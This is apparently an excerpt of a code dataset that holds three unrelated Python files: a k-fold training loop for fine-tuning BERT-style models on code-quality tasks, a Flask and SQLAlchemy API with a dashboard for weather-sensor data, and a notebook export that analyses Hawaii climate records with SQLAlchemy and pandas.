action=\"store_true\", help=\"Whether to run eval on the dev set.\")\n parser.add_argument(\n \"--evaluate_during_training\", action=\"store_true\", help=\"Run evaluation during training at each logging step.\",\n )\n parser.add_argument(\n \"--per_gpu_train_batch_size\", default=8, type=int, help=\"Batch size per GPU/CPU for training.\",\n )\n parser.add_argument(\n \"--per_gpu_eval_batch_size\", default=64, type=int, help=\"Batch size per GPU/CPU for evaluation.\",\n )\n parser.add_argument(\n \"--gradient_accumulation_steps\",\n type=int,\n default=1,\n help=\"Number of updates steps to accumulate before performing a backward/update pass.\",\n )\n parser.add_argument(\"--learning_rate\", default=2e-5, type=float, help=\"The initial learning rate for Adam.\")\n parser.add_argument(\"--weight_decay\", default=0.0, type=float, help=\"Weight decay if we apply some.\")\n parser.add_argument(\"--adam_epsilon\", default=1e-8, type=float, help=\"Epsilon for Adam optimizer.\")\n parser.add_argument(\"--max_grad_norm\", default=1.0, type=float, help=\"Max gradient norm.\")\n parser.add_argument(\n \"--num_train_epochs\", default=3.0, type=float, help=\"Total number of training epochs to perform.\",\n )\n parser.add_argument(\n \"--max_steps\",\n default=-1,\n type=int,\n help=\"If > 0: set total number of training steps to perform. 
Override num_train_epochs.\",\n )\n parser.add_argument(\n \"--n_splits\",\n default=None,\n type=int,\n required=True,\n help=\"If > 0: set total number of training steps to perform. Override num_train_epochs.\",\n )\n parser.add_argument(\n \"--cuda\",\n default=\"cuda\",\n type=str,\n help=\"Pretrained tokenizer name or path if not the same as model_name\",\n )\n parser.add_argument(\"--warmup_steps\", default=0, type=int, help=\"Linear warmup over warmup_steps.\")\n\n parser.add_argument('--seeds', nargs='+', type=int, required=False)\n args = parser.parse_args()\n\n args.device = torch.device(args.cuda)\n\n args.task_to_data_dir = {\n \"smell\": \"./data/smell/\",\n \"complexity\": \"./data/complexity/\",\n \"read\": \"./data/read/\",\n }\n return args\n\n\ndef collection(examples, indices):\n temp = []\n for i in indices:\n temp.append(examples[i])\n return temp\n\n\ndef get_config(args):\n processor = processors[args.task_name](args.task_to_data_dir[args.task_name])\n label_list = processor.get_labels()\n num_labels = len(label_list)\n config_class, _, _ = MODEL_CLASSES[args.model_type]\n config = config_class.from_pretrained(\n args.config_name if args.config_name else args.model_name_or_path,\n num_labels=num_labels,\n finetuning_task=args.task_name,\n )\n if args.model_type in [\"bert\", \"roberta\"]:\n # bert dim is 768.\n args.hidden_dim = (768 + args.ib_dim) // 2\n # sets the parameters of IB or MLP baseline.\n config.ib = args.ib\n config.activation = args.activation\n config.hidden_dim = args.hidden_dim\n config.ib_dim = args.ib_dim\n config.beta = args.beta\n config.sample_size = args.sample_size\n config.kl_annealing = args.kl_annealing\n config.deterministic = args.deterministic\n config.use_dropout = args.use_dropout\n return config\n\n\ndef get_train_loader(train_examples, tokenizer, labels, args):\n train_dataset = convert_examples(args, args.task_name, tokenizer, labels, train_examples)\n train_sampler = RandomSampler(train_dataset)\n train_dataloader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args.train_batch_size)\n\n return train_dataloader\n\n\ndef get_test_loader(test_examples, tokenizer, labels, args):\n test_dataset = convert_examples(args, args.task_name, tokenizer, labels, test_examples)\n test_sampler = RandomSampler(test_dataset)\n test_dataloader = DataLoader(test_dataset, sampler=test_sampler, batch_size=args.eval_batch_size)\n\n return test_dataloader\n\n\ndef load_model(model_class, args, config, total_step):\n model = model_class.from_pretrained(args.model_name_or_path, config=config)\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n optimizer_grouped_parameters = [\n {\n \"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": args.weight_decay,\n },\n {\"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0},\n ]\n if args.prior_weight_decay: # I am just addding this because revisiting bert few-sample added it. 
should be checked.\n optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon,\n correct_bias=True, weight_decay=args.weight_decay)\n else:\n optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)\n\n if args.prior_weight_decay:\n optimizer = PriorWD(optimizer, use_prior_wd=args.prior_weight_decay)\n scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=args.warmup_steps,\n num_training_steps=total_step)\n if args.mixout > 0:\n from mixout import MixLinear\n for sup_module in model.modules():\n for name, module in sup_module.named_children():\n if isinstance(module, nn.Dropout):\n module.p = 0.0\n if isinstance(module, nn.Linear) and not ('output' in name and 'attention' not in name):\n target_state_dict = module.state_dict()\n bias = True if module.bias is not None else False\n new_module = MixLinear(\n module.in_features, module.out_features, bias, target_state_dict[\"weight\"], args.mixout\n ).to(args.cuda)\n new_module.load_state_dict(target_state_dict)\n setattr(sup_module, name, new_module)\n return model, optimizer, scheduler\n\n\ndef compute_metrics(out_label_ids, preds_label):\n result = {\n 'f1': f1_score(y_true=out_label_ids, y_pred=preds_label, average='macro'),\n 'recall': recall_score(y_true=out_label_ids, y_pred=preds_label, average='macro'),\n 'precision': precision_score(out_label_ids, preds_label, average='macro'),\n 'acc': accuracy_score(out_label_ids, preds_label)\n }\n return result\n\n\ndef main(args, results, seed):\n args.output_mode = output_modes[args.task_name]\n args.model_type = args.model_type.lower()\n args.train_batch_size = args.per_gpu_train_batch_size\n args.eval_batch_size = args.per_gpu_eval_batch_size\n processor = processors[args.task_name](args.task_to_data_dir[args.task_name])\n label_list = processor.get_labels()\n _, model_class, tokenizer_class = MODEL_CLASSES[args.model_type]\n tokenizer = tokenizer_class.from_pretrained(\n args.tokenizer_name if args.tokenizer_name else args.model_name_or_path\n )\n config = get_config(args)\n kfold = KFold(n_splits=args.n_splits, shuffle=True, random_state=seed)\n examples = processor.get_examples()\n splits = kfold.split(examples)\n for n_split, (train_indices, valid_indices) in enumerate(splits):\n logger.info(\"run fold {}\".format(n_split))\n train_examples = collection(examples, train_indices)\n val_examples = collection(examples, valid_indices)\n train_dataloader = get_train_loader(train_examples, tokenizer, processor.get_labels(), args)\n model, optimizer, scheduler = load_model(model_class, args, config,\n len(train_dataloader) * args.num_train_epochs)\n model.to(args.device)\n model.zero_grad()\n for epoch in trange(int(args.num_train_epochs), desc=\"Epoch\"):\n tr_loss = 0.0\n train_step = 0\n for step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")):\n model.train()\n batch = tuple(t.to(args.device) for t in batch)\n inputs = {\"input_ids\": batch[0], \"attention_mask\": batch[1], \"labels\": batch[3]}\n if args.model_type != \"distilbert\":\n inputs[\"token_type_ids\"] = (\n batch[2] if args.model_type in [\"bert\", \"xlnet\", \"albert\"] else None\n ) # XLM, DistilBERT, RoBERTa, and XLM-RoBERTa don't use segment_ids\n outputs = model(**inputs, epoch=epoch)\n loss = outputs[\"loss\"][\"loss\"] # model outputs are always tuple in transformers (see doc)\n loss.backward()\n tr_loss += loss.item()\n optimizer.step()\n scheduler.step() # Update learning rate schedule\n model.zero_grad()\n 
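# (added note) gradient_accumulation_steps and max_grad_norm are parsed in get_args()\n                    # but never applied in this loop; a hypothetical accumulation variant would be:\n                    #   (loss / args.gradient_accumulation_steps).backward()\n                    #   if (step + 1) % args.gradient_accumulation_steps == 0:\n                    #       optimizer.step(); scheduler.step(); model.zero_grad()\n                    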
train_step += 1\n\n eval_dataloader = get_test_loader(val_examples, tokenizer, label_list, args)\n # Eval!\n eval_loss = 0.0\n nb_eval_steps = 0\n ce_loss = 0.0\n preds = None\n out_label_ids = None\n for batch in tqdm(eval_dataloader, desc=\"Evaluating\"):\n model.eval()\n batch = tuple(t.to(args.device) for t in batch)\n\n with torch.no_grad():\n inputs = {\"input_ids\": batch[0], \"attention_mask\": batch[1], \"labels\": batch[3]}\n if args.model_type != \"distilbert\":\n inputs[\"token_type_ids\"] = (\n batch[2] if args.model_type in [\"bert\", \"xlnet\", \"albert\"] else None\n ) # XLM, DistilBERT, RoBERTa, and XLM-RoBERTa don't use segment_ids\n outputs = model(**inputs, sampling_type=\"argmax\")\n tmp_eval_loss, logits = outputs[\"loss\"]['loss'], outputs[\"logits\"]\n if 'ce_loss' in outputs[\"loss\"]:\n ce_loss += outputs[\"loss\"]['ce_loss'].mean().item()\n else:\n ce_loss += tmp_eval_loss.mean().item()\n eval_loss += tmp_eval_loss.mean().item()\n nb_eval_steps += 1\n if preds is None:\n preds = logits.detach().cpu().numpy()\n out_label_ids = inputs[\"labels\"].detach().cpu().numpy()\n else:\n preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)\n out_label_ids = np.append(out_label_ids, inputs[\"labels\"].detach().cpu().numpy(), axis=0)\n\n eval_loss = eval_loss / nb_eval_steps\n preds_label = np.argmax(preds, axis=1)\n metrics_result = compute_metrics(out_label_ids, preds_label)\n metrics_result['train_loss'] = tr_loss / train_step\n metrics_result['eval_loss'] = eval_loss\n metrics_result['epoch'] = epoch\n metrics_result['fold'] = n_split\n metrics_result['seed'] = seed\n metrics_result['ce_loss'] = ce_loss / nb_eval_steps\n logger.info(metrics_result)\n if results is None:\n results = pd.DataFrame(metrics_result, columns=metrics_result.keys(), index=[0])\n else:\n results = results.append(metrics_result, ignore_index=True)\n results.to_csv(args.output, index=False)\n return results\n\n\nif __name__ == \"__main__\":\n args = get_args()\n\n results = None\n for seed in args.seeds:\n set_seed(seed)\n results = main(args, results, seed)\n","repo_name":"little-pikachu-hash/VIBCodeBERT","sub_path":"run_glue_cross.py","file_name":"run_glue_cross.py","file_ext":"py","file_size_in_byte":17876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"14564361108","text":"#Flask is a microframework for Python that handles web requests according to the WSGI protocol using WSGI library Werkzeug\n#SQLAlchemy is an SQL Toolkit and ORM for Python, Flask-SQLAlchemy is a Flask extension that appends SQLAlchemy onto Flask \n#Flask_CORS allows us to set our Cross Origin Resource Sharing HTTP header values so that we can run this demo locally \n#Marshmallow is a convenient way to deserialize data (like SQLAlchemy objects) \n\nfrom flask import Flask, render_template, request, redirect, jsonify, make_response, abort\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom marshmallow_sqlalchemy import SQLAlchemyAutoSchema\nfrom datetime import datetime\n\napp = Flask(__name__)\n\n#Flask-SQLAlchemy loads configuration keys from Flask, so you set Flask-SQLAlchemy configuraiton keys with Flask's app.config\n#Here we tell Flask-SQLAlchemy where to find the database and what engine to use when interacting with it \n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///solution.db'\ndb = SQLAlchemy(app)\nCORS(app)\n\n#I'm going to normalise the data minimally, organising it into two tables, one for sensors and one for 
sensor data\nclass Sensors(db.Model):\n __tablename__ = 'Sensors'\n id = db.Column(db.String(128), primary_key=True)\n location = db.Column(db.String(128))\n region = db.Column(db.String(128))\n country = db.Column(db.String(128))\n date_created = db.Column(db.DateTime, default = datetime.utcnow)\n\nclass SensorData(db.Model):\n __tablename__ = 'SensorData'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n sensor_id = db.Column(db.String(128), nullable=False)\n date_time = db.Column(db.DateTime, default=datetime.utcnow)\n temperature = db.Column(db.Integer)\n humidity = db.Column(db.Integer)\n wind_speed = db.Column(db.Integer)\n wind_direction = db.Column(db.String(3))\n precipitation_type = db.Column(db.String(24))\n precipitation_rate = db.Column(db.Integer)\n\n#If the database already exists db.create_all() won't do anything, but otherwise it will create the database referenced at SQLALCHEMY_DATABASE_URI\nwith app.app_context():\n db.create_all()\n\n#To deserialize SQLALchemy query results concisely I'm going to use marshmallow_sqlalchemy's SQLAlchemyAutoSchema\nclass SensorSchema(SQLAlchemyAutoSchema):\n class Meta:\n model = Sensors\n load_instance = True\n \nclass SensorDataSchema(SQLAlchemyAutoSchema):\n class Meta:\n model = SensorData\n load_instance = True\n\n\n#API ROOT-----------------------------------------------------------\n@app.route('/api', methods=['GET'])\ndef api_root():\n \n #Load in our marshmallow schema\n sensor_schema = SensorSchema()\n sensor_data_schema = SensorDataSchema()\n #Query our database\n sensors = Sensors.query.order_by(Sensors.date_created).all()\n sensor_data = SensorData.query.order_by(SensorData.date_time).all()\n \n #Deserialise query results and store them in a list \n sensors_list = []\n for sensor in sensors:\n sensor_dump = sensor_schema.dump(sensor)\n sensors_list.append(sensor_dump)\n \n sensor_data_list = []\n for data in sensor_data:\n sensor_data_dump = sensor_data_schema.dump(data)\n sensor_data_list.append(sensor_data_dump)\n\n #Compile lists to dict\n response = {\"Sensors\": sensors_list, \"Sensor Data\": sensor_data_list}\n #Make response\n return make_response(str(response), 200)\n\n#SENSORS API---------------------------------------------------------\n@app.route('/api/sensors', methods=['GET', 'POST', 'DELETE'])\ndef sensors():\n\n if request.method == 'GET':\n\n #Load in our marshmallow schema\n sensor_schema = SensorSchema()\n #Query our database\n sensors = Sensors.query.order_by(Sensors.date_created).all()\n #Deserialise query results and store them in a list\n sensors_list = []\n for sensor in sensors:\n sensor_dump = sensor_schema.dump(sensor)\n sensors_list.append(sensor_dump)\n #Make response\n return make_response(str(sensors_list), 200)\n \n \n if request.method == 'POST':\n \n #Load the request body as a dict\n data = request.values\n id = data['id']\n location = data['location']\n region = data['region']\n country = data['country']\n \n #Check that the id doesn't already exist in the table\n #If it does, return a 403 (Forbidden)\n id_exists = db.session.query(db.session.query(Sensors).filter_by(id=id).exists()).scalar()\n if id_exists == True:\n abort(403)\n \n #Otherwise, as all other fields are nullable other data is valid\n new_sensor = Sensors(id=id, location=location, region=region, country=country)\n\n #Commit to db and return success code\n try:\n db.session.add(new_sensor)\n db.session.commit()\n return make_response('Success', 201)\n except Exception as e:\n #Or return failure\n return 
make_response('Exception returned attempting to add new sensor: ' + str(e), 500)\n\n\n if request.method == 'DELETE':\n \n #Load the request data to find the id\n data = request.values\n id_to_drop = data['id']\n\n #Find the object with corresponding id in the table\n sensor = Sensors.query.get_or_404(id_to_drop)\n\n #Delete it and return success\n try:\n db.session.delete(sensor)\n db.session.commit()\n return make_response(jsonify('Success'), 200)\n except Exception as e: \n #Or return failure\n return make_response(jsonify('Failed to delete sensor via API: ' + str(e)), 500)\n\n#SENSOR DATA API--------------------------------------------------------\n@app.route('/api/data', methods=['GET', 'POST', 'DELETE'])\ndef sensor_data():\n\n if request.method == 'GET':\n #Load Marshmallow schema\n sensor_data_schema=SensorDataSchema()\n #Query Database\n sensor_data = SensorData.query.order_by(SensorData.date_time).all()\n #Deserialise query results and store in list\n sensor_data_list = []\n for data in sensor_data:\n sensor_data_dump = sensor_data_schema.dump(data)\n sensor_data_list.append(sensor_data_dump)\n return make_response(str(sensor_data_list), 200)\n \n if request.method == 'POST':\n \n #Load the request body as a dict\n data = request.values\n\n #All sensor data POST requests MUST have a sensor_id that corresponds to an existing sensor\n #So we're going to check that here\n sensor_id = data['sensor_id']\n\n sensor_id_exists = db.session.query(db.session.query(Sensors).filter_by(id=sensor_id).exists()).scalar()\n if sensor_id_exists == False:\n abort(403)\n\n temperature = data['temperature']\n humidity = data['humidity']\n wind_speed = data['wind-speed']\n wind_direction = data['wind-direction']\n precipitation_type = data['precipitation-type']\n precipitation_rate = data['precipitation-rate']\n new_sensor_data = SensorData(sensor_id=sensor_id, temperature=temperature, humidity=humidity, wind_speed=wind_speed, wind_direction=wind_direction, precipitation_type=precipitation_type, precipitation_rate=precipitation_rate)\n \n #Commit to db and return success code\n try: \n db.session.add(new_sensor_data)\n db.session.commit()\n return make_response(jsonify('Success'),201)\n except Exception as e:\n #Or return failure\n return make_response(jsonify('Exception returned attempting to add new sensor data: ' + str(e)), 500)\n\n if request.method == 'DELETE':\n \n #Load the request data to find the id\n data = request.values\n id_to_drop = data['id']\n\n #Find the object with the corresponding id in the table\n sensor_data = SensorData.query.get_or_404(id_to_drop)\n\n #Delete it and return success\n try:\n db.session.delete(sensor_data)\n db.session.commit()\n return make_response(jsonify('Success'), 200)\n except Exception as e: \n return make_response(jsonify('Exception returned attempting to delete sensor data entry: ' + str(e)), 500)\n\n#QUERY API---------------------------------------------------------------\n#api/query request must inlcude 5 parameters: metric1 (calculation), metric2 (metric), location, time_from, and time_to\n@app.route('/api/query', methods=['GET'])\ndef respondToQuery():\n \n #request.args can read the arguments passed to a url by a HTTP request\n metric1 = request.args.get('metric1')\n metric2 = request.args.get('metric2')\n location = request.args.get('location')\n time_from = request.args.get('from')\n time_to = request.args.get('to')\n \n #populate list of all sensors\n sensors = Sensors.query.all()\n\n #check which ones are located in the region specified by the 
query\n    local_sensors = []\n    for sensor in sensors:\n        if location in sensor.region.lower() or location in sensor.country.lower():\n            local_sensors.append(sensor.id)\n\n    #Now we can query to see what sensor data entries are within the user set time period\n    in_period_entries = SensorData.query.filter(SensorData.date_time.between(time_from, time_to)).all()\n    \n    #Now let's see which sensor data entries come from local sensors in the time period set\n    valid_entries = []\n    for data in in_period_entries:\n        if data.sensor_id in local_sensors:\n            valid_entries.append(data)\n\n    #Now we can calculate whatever metric the user has requested\n    values = []\n    for entry in valid_entries:\n        if metric2 == 'temp':\n            values.append(entry.temperature)\n        if metric2 == 'humidity':\n            values.append(entry.humidity)\n        if metric2 == 'wind-speed':\n            values.append(entry.wind_speed)\n        if metric2 == 'precipitation':\n            #the model defines precipitation_rate, not precipitation\n            values.append(entry.precipitation_rate)\n    \n    if metric1 == 'max':\n        return make_response(str(max(values)), 200)\n    if metric1 == 'min':\n        return make_response(str(min(values)), 200)\n    if metric1 == 'mean':\n        return make_response(str(sum(values) / len(values)), 200)\n\n\n#DASHBOARD STUFF ---------------------------------------------------------------------------------------------------------------------\n#Accessing root will return a dashboard showing the information in the server at any given time\n@app.route('/')\ndef index():\n    sensors = Sensors.query.order_by(Sensors.date_created).all()\n    sensor_data = SensorData.query.order_by(SensorData.date_time).all()\n    return render_template('index.html', sensors=sensors, sensor_data=sensor_data)\n\n#Passing index() an error will create an error box at the top of the page\n#(the '/' route keeps the zero-argument view bound at decoration time; this redefinition only serves the internal index(error) calls below)\ndef index(error):\n    sensors = Sensors.query.order_by(Sensors.date_created).all()\n    sensor_data = SensorData.query.order_by(SensorData.date_time).all()\n    error = error\n    return render_template('index.html', sensors=sensors, sensor_data=sensor_data, error=error)\n\n#You can add additional sensors from the dashboard with a HTML form\n@app.route('/sensors', methods=['POST'])\ndef dash_sensors(): \n    #We can't have duplicate primary keys in the Sensors table, let's catch that and display an error in-page\n    #if a user tries to use an existing sensor-id\n    id = request.form['sensor-id']\n    idExists = db.session.query(db.session.query(Sensors).filter_by(id=id).exists()).scalar()\n    if idExists == True:\n        return index(\"ERROR: Sensor ID '\" + id + \"' already in use\")\n    \n    location = request.form['sensor-location']\n    region = request.form['sensor-region']\n    country = request.form['sensor-country']\n    new_sensor = Sensors(id=id, location=location, region=region, country=country)\n    try: \n        db.session.add(new_sensor)\n        db.session.commit()\n        return redirect('/')\n    except Exception as e:\n        return 'Exception returned attempting to add new sensor: ' + str(e)\n\n#You can remove sensors from the dashboard too, although it's implemented with a GET and not a drop\n@app.route('/delete-sensor/<id>', methods=['GET'])\ndef dash_deleteSensor(id):\n    #I've implemented the delete links hastily by using plain GET links\n    sensor = Sensors.query.get_or_404(id)\n    try:\n        db.session.delete(sensor)\n        db.session.commit()\n        return redirect('/')\n    except Exception as e: \n        return index('Exception returned attempting to delete sensor: ' + str(e))\n\n#You can add additional sensor data from the dashboard with a HTML form\n@app.route('/data', methods=['POST'])\ndef dash_data():\n    #We need to check that a sensor exists under a given ID for the data input to be valid\n    #sensor
 data is assigned an ID and DateTime on construction\n    sensor_id = request.form['sensor-id']\n    idExists = db.session.query(db.session.query(Sensors).filter_by(id=sensor_id).exists()).scalar()\n    if idExists == False:\n        return index(\"ERROR: Sensor '\" + sensor_id + \"' not found.\")\n    temperature = request.form['temp']\n    humidity = request.form['humidity']\n    wind_speed = request.form['wind']\n    wind_direction = request.form['wind-dir']\n    precipitation_type = request.form['precip']\n    precipitation_rate = request.form['precip-q']\n    new_data = SensorData(sensor_id=sensor_id, temperature=temperature, humidity=humidity, wind_speed=wind_speed, wind_direction=wind_direction, precipitation_rate=precipitation_rate, precipitation_type=precipitation_type)\n\n    try:\n        db.session.add(new_data)\n        db.session.commit()\n        return redirect('/')\n    except Exception as e:\n        return index('Exception returned attempting to add new sensor data ' + str(e))\n\n#You can remove sensor data from the dashboard too, although it's implemented with a GET and not a drop\n@app.route('/delete-data/<id>', methods=['GET'])\ndef dash_delete_data(id):\n    sensor_data = SensorData.query.get_or_404(id)\n    try:\n        db.session.delete(sensor_data)\n        db.session.commit()\n        return redirect('/')\n    except Exception as e: \n        return index('Exception returned attempting to delete data: ' + str(e))\n\n\nif __name__ == \"__main__\":\n    app.run(debug=True)","repo_name":"TadghW/psychic-winner","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":14320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
{"seq_id":"20816752389","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# %matplotlib inline\nfrom matplotlib import style\nstyle.use('fivethirtyeight')\nimport matplotlib.pyplot as plt\n\n\n# In[2]:\n\n\nimport numpy as np\nimport pandas as pd\n\n\n# In[3]:\n\n\nimport datetime as dt\nfrom datetime import datetime, timedelta\nfrom pprint import pprint\n\n\n# # Reflect Tables into SQLAlchemy ORM\n\n# In[4]:\n\n\n# Python SQL toolkit and Object Relational Mapper\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\nfrom sqlalchemy import inspect\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, Float\nfrom sqlalchemy.types import Date\n\n\n# In[5]:\n\n\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n\n# In[6]:\n\n\n# reflect an existing database into a new model\nbase = automap_base()\n# reflect the tables\nbase.prepare(engine, reflect = True)\n\n\n# In[7]:\n\n\n# We can view all of the classes that automap found\nbase.classes.keys()\n# https://www.learnpython.org/en/Classes_and_Objects (understand difference between object and classes)\n\n\n# In[8]:\n\n\n# Save references to each table\nmeasurement = base.classes.measurement\nstation = base.classes.station\nstation\n\n\n# In[9]:\n\n\n# Create our session (link) from Python to the DB\nsession = Session(bind=engine)\nsession\n\n\n# # Exploratory Climate Analysis\n\n# In[10]:\n\n\ncmd = \"\"\"SELECT date\nFROM measurement\n\"\"\"\nprint(pd.read_sql(cmd, con=engine))\n\n\n# Design a query to retrieve the last 12 months of precipitation data and plot the results\n\n\n# # Calculate the date 1 year ago from the last data point in the database\n\n# # Perform a query to retrieve the data and precipitation scores\n\n# # Save the query results as a Pandas DataFrame and set
 the index to the date column\n\n# # Sort the dataframe by date\n\n# # Use Pandas Plotting with Matplotlib to plot the data\n\n\n# In[11]:\n\n\nlast_date = session.query(func.max(measurement.date)).first()[0]\nprint(\"The last day data was collected was: \" + last_date)\n\n\n# In[12]:\n\n\ntype(last_date)\n\n\n# In[13]:\n\n\ndate_time_obj = dt.datetime.strptime(last_date, '%Y-%m-%d')\ndate_time_obj\n\n\n# In[14]:\n\n\ntype(date_time_obj)\n# convert this one to datetime.delta for te\n\n\n# In[15]:\n\n\ntype(dt.timedelta(days=365))\n\n\n# In[16]:\n\n\n# # Calculate the date 1 year ago from the last data point in the database\none_year_ago = date_time_obj - timedelta(days=365)\nprint(\"The last year of data collection began: \" + str(one_year_ago))\n\n\n# In[17]:\n\n\none_year_ago_query = session.query(measurement).filter(measurement.date >= one_year_ago, measurement.date <= last_date)\none_year_ago_query\n\n\n# In[18]:\n\n\nlast_year_df = pd.read_sql(one_year_ago_query.statement, one_year_ago_query.session.bind)\nprint(\"This dataframe includes the last year of data via multiple session queries : \")\nlast_year_df\n\n\n# In[19]:\n\n\n# # Perform a query to retrieve the data and precipitation scores\n# # Save the query results as a Pandas DataFrame and set the index to the date column\n# # Sort the dataframe by date\nprcp_data_df = pd.read_sql(\"SELECT date, prcp FROM measurement WHERE date > '2016-08-23'\", con=engine)\nprint(\"This dataframe includes the last year of data via a single line query: \")\nprcp_data_df\n\n\n# ## Use Pandas Plotting with Matplotlib to plot the data\n\n# In[20]:\n\n\nprcp_data_df.plot(\"date\", \"prcp\", rot=90, figsize=(10,6), title=\"Precipitation for last 12 months\")\nplt.xticks()\nplt.xlabel(\"Date\")\nplt.ylabel(\"Inches\")\nplt.tight_layout()\nplt.savefig(\"images/12_mo_prcp.png\")\n\n\n# In[21]:\n\n\n# Use Pandas to calculate the summary statistics for the precipitation data\nprcp_summary = prcp_data_df[[\"prcp\"]].describe()\nprint(\"The summary of precip data from the last year is: \") \nprcp_summary\n\n\n# In[22]:\n\n\n# Design a query to show how many stations are available in this dataset?\nstation_count = session.query(station).count()\nstation_count\n\n\n# In[23]:\n\n\n# What are the most active stations? (i.e. 
what stations have the most rows)?\n# List the stations and the counts in descending order.\nactivity_count = (session.query(measurement.station, func.count(measurement.date)).group_by(measurement.station).order_by(func.count(measurement.date).desc()).all())\nprint(\"This is the activity count: \")\npprint(activity_count)\n\n\n# In[24]:\n\n\nactive_stations_df = pd.DataFrame(activity_count, columns=[\"Station\", \"Measurement Count\"], )\nactive_stations_df\n\n\n# In[25]:\n\n\nmost_active = (session.query(measurement.station, func.count(measurement.date)).group_by(measurement.station).order_by(func.count(measurement.date).desc()).first())\nprint(most_active)\n\n\n# In[26]:\n\n\n# Using the station id from the previous query, calculate the lowest temperature recorded, \n# highest temperature recorded, and average temperature of the most active station?\nmost_active = session.query(measurement.station, station.name, \n func.min(measurement.tobs),\n func.max(measurement.tobs), \n func.avg(measurement.tobs)).filter(measurement.station == 'USC00519281')\n\npd.DataFrame(most_active, columns=[\"Station\", \"Station Name\", \"min-temp\", \"max-temp\", \"avg-temp\"])\n\n\n# In[ ]:\n\n\n\n\n\n# In[27]:\n\n\n# Choose the station with the highest number of temperature observations.\n# Query the last 12 months of temperature observation data for this station and plot the results as a histogram\nmost_active_last12 = session.query(measurement.date, measurement.tobs).filter(measurement.station == 'USC00519281').filter(measurement.date >= one_year_ago, measurement.date <= last_date)\n\nmost_active_last12_df = pd.DataFrame(most_active_last12, columns=[\"date\", \"temp\"])\nmost_active_last12_df\n\n\n# In[28]:\n\n\n\nmost_active_last12_df.plot.hist(\"tobs\", bins=12)\nplt.title(\"12 month tobs for most active station\")\nplt.savefig(\"images/12_mo_histogram.png\")\n\n\n# ## Bonus Challenge Assignment\n\n# In[30]:\n\n\n# This function called `calc_temps` will accept start date and end date in the format '%Y-%m-%d' \n# and return the minimum, average, and maximum temperatures for that range of dates\ndef calc_temps(start_date, end_date):\n \"\"\"TMIN, TAVG, and TMAX for a list of dates.\n \n Args:\n start_date (string): A date string in the format %Y-%m-%d\n end_date (string): A date string in the format %Y-%m-%d\n \n Returns:\n TMIN, TAVE, and TMAX\n \"\"\"\n \n return session.query(func.min(measurement.tobs), func.avg(measurement.tobs), func.max(measurement.tobs)). filter(measurement.date >= start_date).filter(measurement.date <= end_date).all()\n\n# function usage example\nprint(calc_temps('2012-02-28', '2012-03-05'))\n\n\n# In[32]:\n\n\n# Use your previous function `calc_temps` to calculate the tmin, tavg, and tmax \n# for your trip using the previous year's data for those same dates.\ntrip_calc = calc_temps('2016-08-24', '2017-08-18')\nprint(trip_calc)\n\n\n# In[48]:\n\n\n# Plot the results from your previous query as a bar chart. \n# Use \"Trip Avg Temp\" as your Title\n# Use the average temperature for the y value\n# Use the peak-to-peak (tmax-tmin) value as the y error bar (yerr)\n\n\n# In[49]:\n\n\n# Calculate the total amount of rainfall per weather station for your trip dates using the previous year's matching dates.\n# Sort this in descending order by precipitation amount and list the station, name, latitude, longitude, and elevation\n\n\n# In[51]:\n\n\n# Create a query that will calculate the daily normals \n# (i.e. 
the averages for tmin, tmax, and tavg for all historic data matching a specific month and day)\n\ndef daily_normals(date):\n    \"\"\"Daily Normals.\n    \n    Args:\n        date (str): A date string in the format '%m-%d'\n        \n    Returns:\n        A list of tuples containing the daily normals, tmin, tavg, and tmax\n    \n    \"\"\"\n    \n    sel = [func.min(measurement.tobs), func.avg(measurement.tobs), func.max(measurement.tobs)]\n    return session.query(*sel).filter(func.strftime(\"%m-%d\", measurement.date) == date).all()\n    \ndaily_normals(\"01-01\")\n\n\n# In[ ]:\n\n\n# calculate the daily normals for your trip\n# push each tuple of calculations into a list called `normals`\n\n# Set the start and end date of the trip\n\n# Use the start and end date to create a range of dates\n\n# Strip off the year and save a list of %m-%d strings\n\n# Loop through the list of %m-%d strings and calculate the normals for each date\n\n\n# In[ ]:\n\n\n# Load the previous query results into a Pandas DataFrame and add the `trip_dates` range as the `date` index\n\n\n# In[ ]:\n\n\n# Plot the daily normals as an area plot with `stacked=False`\n\n\n# In[ ]:\n\n## Flask API\nfrom flask import Flask, jsonify, request\nfrom flask_sqlalchemy import SQLAlchemy\nimport datetime\nimport os\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef main():\n\treturn \"These are the available routes\"\n\nif __name__ == \"__main__\":\n\tapp.run(debug=True)\n\n","repo_name":"Yanwho/sqlalchemy-challenge","sub_path":".ipynb_checkpoints/app-checkpoint.py","file_name":"app-checkpoint.py","file_ext":"py","file_size_in_byte":8815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
